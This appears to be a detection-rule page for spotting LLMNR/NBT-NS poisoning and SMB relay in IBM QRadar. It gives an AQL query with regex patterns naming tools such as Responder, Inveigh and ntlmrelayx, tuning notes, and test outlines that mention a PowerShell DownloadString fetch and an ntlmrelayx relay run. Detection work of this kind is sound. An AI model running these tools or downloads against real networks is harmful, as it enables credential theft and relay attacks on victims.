Detect LLMNR/NBT-NS Poisoning and SMB Relay in IBM QRadar
Adversaries may spoof an authoritative source for name resolution to force communication with an adversary-controlled system, collecting or relaying authentication materials. By responding to LLMNR (UDP 5355) and NBT-NS (UDP 137) queries, attackers poison name resolution so that victims authenticate to the adversary system, capturing NTLMv1/v2 hashes for offline cracking or relay attacks. Captured hashes may be relayed directly to SMB, LDAP, MSSQL, or HTTP services to authenticate as the victim without ever cracking the hash. Tools such as Responder, Inveigh, Impacket ntlmrelayx, and NBNSpoof are commonly used. Threat actors including Lazarus Group and Wizard Spider have used this technique for credential collection and lateral movement.
MITRE ATT&CK
- Tactic
- Credential Access Collection
- Technique
- T1557 Adversary-in-the-Middle
- Sub-technique
- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay
- Canonical reference
- https://attack.mitre.org/techniques/T1557/001/
QRadar Detection Query
SELECT
DATEFORMAT(deviceTime, 'yyyy-MM-dd HH:mm:ss') AS event_time,
devicehostname AS host,
username,
sourceip,
"Process Image" AS process_image,
"Process CommandLine" AS command_line,
"Parent Process Image" AS parent_image,
QIDNAME(qid) AS event_name,
CATEGORYNAME(category) AS category_name
FROM events
WHERE
(
LOWER("Process Image") MATCHES '(?i)(responder\.exe|inveigh\.exe|ntlmrelayx\.exe|smbrelayx\.exe|multirelay\.exe|nbnspoof\.exe|conveigh\.exe)'
OR LOWER("Process CommandLine") MATCHES '(?i)(responder|inveigh|invoke-inveigh|ntlmrelayx|smbrelayx|multirelay|nbnspoof|llmnr_response|-rpv|inveigh-unprivileged)'
OR (
LOWER("Process Image") MATCHES '(?i)python[23]?\.exe'
AND LOWER("Process CommandLine") MATCHES '(?i)(responder|inveigh|ntlmrelayx|smbrelayx|multirelay|nbnspoof|llmnr_response)'
)
)
LAST 24 HOURS
ORDER BY deviceTime DESCDetects LLMNR/NBT-NS poisoning and SMB relay tool execution in IBM QRadar AQL via Windows Sysmon process creation events. Uses custom property mappings populated by the Windows Sysmon DSM: 'Process Image' (launched process path) and 'Process CommandLine'. Covers direct tool execution, Python-based Impacket variants, and command-line keyword indicators across Responder, Inveigh, ntlmrelayx, smbrelayx, and NBNSpoof toolsets. Custom property field names may differ by QRadar deployment — verify in Administration > Custom Properties.
Data Sources
Required Tables
False Positives & Tuning
- Authorized penetration testers running Responder or ntlmrelayx from whitelisted source IPs or known service accounts during documented assessment windows — add sourceip or username exclusions to the WHERE clause.
- Python-based internal automation or scripting tools whose argument strings contain overlapping terms such as 'responder' (HTTP response callback classes), 'relay' (event relay services), or 'inveigh' for unrelated logic.
- Security awareness simulation platforms that spawn poisoning tool processes in controlled lab environments forwarding logs to the production QRadar instance.
Other platforms for T1557.001
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Invoke-Inveigh LLMNR and NBT-NS Poisoning via PowerShell
Expected signal: Sysmon Event ID 1: powershell.exe with CommandLine containing 'Invoke-Inveigh', 'Net.WebClient', and 'DownloadString'. Sysmon Event ID 3: PowerShell process binding/connecting on UDP 5355 and UDP 137. PowerShell ScriptBlock Log Event ID 4104 capturing the full Inveigh module code and runtime output. Sysmon Event ID 22 (DNS Query) for the GitHub download request.
- Test 2Responder Python Execution in Analyze Mode
Expected signal: Sysmon Event ID 1: python3.exe with CommandLine containing 'Responder.py' and '-I'. Sysmon Event ID 3: python3.exe binding on UDP 5355 (LLMNR) and UDP 137 (NBT-NS). DeviceNetworkEvents: InitiatingProcessFileName=python3.exe with LocalPort=5355 or 137. DeviceProcessEvents: FileName=python3.exe, ProcessCommandLine contains 'Responder'.
- Test 3Impacket ntlmrelayx Relay Tool Execution Against Loopback Target
Expected signal: Sysmon Event ID 1: python3.exe with CommandLine containing 'ntlmrelayx.py', '-t', and 'smb://'. Sysmon Event ID 3: python3.exe attempting TCP connection to 127.0.0.1:445. DeviceProcessEvents: FileName=python3.exe, ProcessCommandLine contains 'ntlmrelayx'. Connection will fail (no SMB listener on loopback) but all process creation telemetry fires.
- Test 4Disable LLMNR and NBT-NS via Registry — Defensive Control Validation
Expected signal: Sysmon Event ID 13 (Registry Value Set): HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast set to DWORD 0. Sysmon Event ID 1: powershell.exe with CommandLine containing 'Win32_NetworkAdapterConfiguration' and 'SetTcpipNetbios'. Security Event ID 4657 (if Object Access auditing enabled): registry key modification logged.
References (12)
- https://attack.mitre.org/techniques/T1557/001/
- https://github.com/SpiderLabs/Responder
- https://github.com/Kevin-Robertson/Inveigh
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
- https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html
- https://github.com/SecureAuthCorp/impacket
- https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning
- https://github.com/nomex/nbnspoof
- https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicenetworkevents-table
- https://learn.microsoft.com/en-us/windows-server/networking/technologies/netbios/netbios
Unlock Pro Content
Get the full detection package for T1557.001 including response playbook, investigation guide, and atomic red team tests.